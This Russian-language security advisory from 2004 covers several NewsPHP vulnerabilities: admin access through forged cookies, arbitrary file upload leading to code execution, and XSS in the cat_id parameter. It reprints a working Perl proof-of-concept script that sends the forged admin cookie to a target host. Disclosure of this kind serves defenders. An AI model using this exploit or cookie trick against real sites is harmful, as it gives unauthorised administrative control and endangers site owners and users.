Дата публикации: | 14.04.2004 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 1608 |
Опасность: | Высокая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Межсайтовый скриптинг Повышение привилегий Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | NewsPHP |
Уязвимые версии: NewsPHP
Описание: Несколько уязвимостей обнаружено в NewsPHP. Удаленный пользователь может получить полный административный доступ к приложению. Удаленный пользователь может представить следующие куки, чтобы получить административный доступ к приложению: autorized=admin; root=adminЭксплоит ниже. Также удаленный авторизованный администратор (или пользователь, эксплуатирующий уязвимость выше) может использовать File Upload, чтобы загрузить произвольные файлы на сервер, вместо видео файлов и затем выполнить их с привилегиями Web сервера. Также обнаружена XSS уязвимость: /index.php?cat_id=[XSS] Пример/Эксплоит: #!/usr/bin/perl -w ## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm use IO::Socket; if (@ARGV < 3) print "\n\n"; print "PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n"; print "Usage: POCnws.pl [host] [directory] [file.htm]\n\n"; print "By: Manuel Lopez mantra at gulo.org\n"; print "\n\n"; exit(1); $host = $ARGV[0]; $directorio = $ARGV[1]; $fichero = $ARGV[2]; print "\n"; print "----- Conecting .. <====\n\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",PeerPort => "80") || die "$socket error $!"; print "====> Conected\n"; print "====> Sending Data .. \n"; $socket->print(<<fin) or die "write: $!"; GET http://$host/$directorio/ HTTP/1.1 Cookie: autorized=admin; root=admin fin print "====> OK\n"; print "====> Generating $fichero ...\n"; open( Result, ">$fichero"); print Result while <$socket>; close Result; URL производителя: http://www.newsphp.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | XSS, Admin Access via Cookie and File Upload vulnerability in NewsPHP. |